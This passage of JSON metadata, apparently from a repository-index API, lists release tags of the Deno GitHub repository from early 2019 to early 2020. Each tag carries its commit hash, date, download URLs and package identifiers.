osts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2